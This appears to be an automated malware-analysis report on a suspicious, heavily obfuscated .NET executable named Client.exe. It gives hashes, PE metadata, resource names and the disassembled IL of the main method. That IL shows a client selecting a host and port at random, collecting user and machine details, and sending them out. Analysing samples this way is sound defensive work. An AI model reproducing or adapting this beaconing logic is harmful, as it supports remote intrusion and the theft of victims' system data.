Suspicious
Suspect

6a32c4ab92cb87031744702b3cd65ea6

PE Executable
|
MD5: 6a32c4ab92cb87031744702b3cd65ea6
|
Size: 524.3 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
6a32c4ab92cb87031744702b3cd65ea6
Sha1
e6c91ac8388a42fd1f87819adaf25ea15d494702
Sha256
e4f1163ae08e51ea8206a3a88c24e7db04b18b6208ed3aef68caf0fdd0e23cd0
Sha384
4148e2ee50544b1085f8d6d22ad348af1abe3321131d199342db1bfe07556148cdab7c590982d64041f677ab7b7d5318
Sha512
fd2a95fea6c96facd12f19dfe7afd8f44e7796f0767664e348bb9a95e3e9ba9c9028d4c36588f731754b097f3d2ad6e6947023503fa4835dd257ff2b1c17e668
SSDeep
12288:lBxznrnMEvK15UFo8SkIOPipFPgA8z2PFck:dMWWGFIkzPsk
TLSH
43B408257F998E10D584287ECA7E3A09CB12E0F225027343374AF6A25D459DEDE2D3DB

PeID

Microsoft Visual C++ 8
Microsoft Visual C++ 8
Microsoft Visual C++ 8.0
File Structure
6a32c4ab92cb87031744702b3cd65ea6
[Rebuild from dump]_05c631a8.exe
.Net Resources
xr1sr7qlzam62x
kv5wb0nvwaultc2kge39ffzqbd0e
Informations
Name
 Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK
Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_05c631a8.exe
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

573
Main Method

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::rgElIbRkXVNSciKPaRTJBYt() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::kWhsoqQluN() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uVWWqpbyPDOnTmwI() stloc V_3 nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::FyrTmBAltYwgFcXONQuD() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() br IL_000E: nop call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() call System.Void CUxoMbvVgcXMoGKxVoaK.vnbNcMlqMWYAZgrFEdFeFZy::SSMAUbgpSd() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CMYsrFjdKefl call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::oBQSvVDeMRXWOSGPvZl() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Void cZVjefEwnZsnjJOHvXH.xCLWyHXCIbK::ZbTMNShaOylW() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Boolean wtSRwNLztBh.jTuSSeSkbAcFvndHtMa::VQanbghlGC(System.String) brtrue IL_0080: call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() leave IL_0283: ret call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() call System.Void cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fHmOFAMiuXXriubneGl() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brtrue IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CFyiiCXKwOUgdrCQpS call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::dTZadzVjNGshhfvVBHUVkwQf() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::KbqYGWCFnceStJB() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::CfSEyXxbsLIZhJhCuIS() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fKHkpctDRDIySqiQy() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::SmdOguNcXevbXkqdAr() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iOWetKoDKGrbQETqf() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QeMWNEPIpgXHpqqsPMvIkErr() ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::VgDeXEuLjj() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::LMASOlVIfDRBkY() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::GuXJMmVTrYMdSbdvGGdgDL() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::kypNenEEiFoJ() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::tziiLzEfSGhxAoZXaqs() ldelem System.String ldloc V_2 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::bCUOveIAYUxYqhrVRTfYrWUOZ(System.String,System.String) ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brfalse IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::gfIYnrhIiDadhybmaKjU ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::TLqIxCtNMPrZNzS ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uCHCgCHKuHrl() newarr System.Object dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QdKdEJTmstXkddHhiCqKCjrr() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::zmNzndpjmAbAfjLUhlco() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::BJsukLOwDjKOtWgYXBI() call System.Byte[] cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::rTUkrdfonFQOSYHpsOqsxaNG() stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::RCZzdMEBashlTxCzbsIiI() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::lUVQJYyOGuT stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::atwSofJlfiiHOyksQYGMVK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::hRyLoWoWPvIBphvDHZ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::ZuwThxesab() call System.String System.Environment::get_UserName() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AsvRXRtvfMCIjf() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::cfCKXYroNyCMjEPibkb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::kFOuAXqJXQ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::TPrXXsMcoApIgkWFpGBiUgxD() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::KRfdmgcRRTSVPZPJpQYpEV stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iNPRPDIyfJMnfmeM() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::EvypZrEfnhcECfqw stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AMIugyhJsVitbm() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::oGrQEEIIItLTtowMAZjBY stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::nBofwKYxhJAaKRK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::wlgiSjyVlNAszbloxainqDZMo stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::WVFflvcCOiIWhZF() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::STEyLKGpvGp stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::XuzdxzQEbPb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::LQAIWrxPnTPuCNOYaSsQmTl stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fXXrhCMXVGhsZmQNCBQHE() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::QLszPQxRKLMJhJcUrGA stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::DPShVWFAEVTrXrKQpeNhiQNGE() call System.String cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fDBuaXSzRrAZXwfpOfZY() stelem.ref <null> call System.Byte[] ZNRPfvuZnQCEteylUNIvZ.PxSHxfkHRdTMmZayyPpNaY::MKbifLnZcMrNFw(System.Object[]) callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::ZyKtPKSmkXRLYCStPkjFuVZk(System.Byte[]) call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse pop <null> leave IL_0283: ret ret <null>
Artefacts
Name
 Value
PE Layout

MemoryMapped (process dump suspected)
PE Layout

MemoryMapped (process dump suspected)
6a32c4ab92cb87031744702b3cd65ea6 (524.3 KB)
File Structure
6a32c4ab92cb87031744702b3cd65ea6
[Rebuild from dump]_05c631a8.exe
.Net Resources
xr1sr7qlzam62x
kv5wb0nvwaultc2kge39ffzqbd0e
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
PE Layout

MemoryMapped (process dump suspected)

6a32c4ab92cb87031744702b3cd65ea6
PE Layout

MemoryMapped (process dump suspected)

6a32c4ab92cb87031744702b3cd65ea6 > [Rebuild from dump]_05c631a8.exe
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙